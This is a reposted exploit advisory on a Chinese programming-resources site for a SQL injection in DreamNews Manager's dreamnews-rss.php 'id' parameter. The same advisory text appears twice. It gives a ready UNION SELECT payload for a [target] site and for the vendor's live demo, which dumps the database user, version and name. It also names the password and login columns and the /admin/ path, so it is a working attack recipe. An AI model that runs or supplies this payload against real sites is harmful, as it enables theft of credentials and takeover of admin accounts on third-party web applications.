您现在的位置是:网站首页> 编程资料编程资料
DreamNews Manager (id) Remote SQL Injection Vulnerability _Exploit_网络安全_
2023-05-24
449人已围观
简介 DreamNews Manager (id) Remote SQL Injection Vulnerability _Exploit_网络安全_
#########################################################
#
# dreamnews ( rss) Remote SQL Injection Vulnerability
#========================================================
# Author: Hussin X =
# =
# Home : www.tryag.cc/cc =
# =
# email: darkangel_g85[at]Yahoo[DoT]com =
# =
#=========================================================
#
# script : http://dreamlevels.com/dreamnews.php
#
# DorK : N/A
#
##########################################################
Exploit:
www.[target].com/Script/dreamnews-rss.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--
L!VE DEMO:
http://dreamlevels.com/demo/dreamnews/dreamnews-rss.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--
column_name :
user_password
user_login
Admin Login :
/admin/
########################( Greetz )###########################
# #
# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke #
# #
# Iraqihack / FAHD / mos_chori / Silic0n #
# #
#############################################################
Im IRAQi
#
# dreamnews ( rss) Remote SQL Injection Vulnerability
#========================================================
# Author: Hussin X =
# =
# Home : www.tryag.cc/cc =
# =
# email: darkangel_g85[at]Yahoo[DoT]com =
# =
#=========================================================
#
# script : http://dreamlevels.com/dreamnews.php
#
# DorK : N/A
#
##########################################################
Exploit:
www.[target].com/Script/dreamnews-rss.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--
L!VE DEMO:
http://dreamlevels.com/demo/dreamnews/dreamnews-rss.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--
column_name :
user_password
user_login
Admin Login :
/admin/
########################( Greetz )###########################
# #
# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke #
# #
# Iraqihack / FAHD / mos_chori / Silic0n #
# #
#############################################################
Im IRAQi
相关内容
- phpDatingClub (website.php page) Local File Inclusion Vulnerability _Exploit_网络安全_
- gapicms 9.0.2 (dirDepth) Remote File Inclusion Vulnerability _Exploit_网络安全_
- Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit _Exploit_网络安全_
- Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit _Exploit_网络安全_
- IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit _Exploit_网络安全_
- IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit _Exploit_网络安全_
- Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC _Exploit_网络安全_
- _Exploit_网络安全_
- MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit _Exploit_网络安全_
- MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit _Exploit_网络安全_
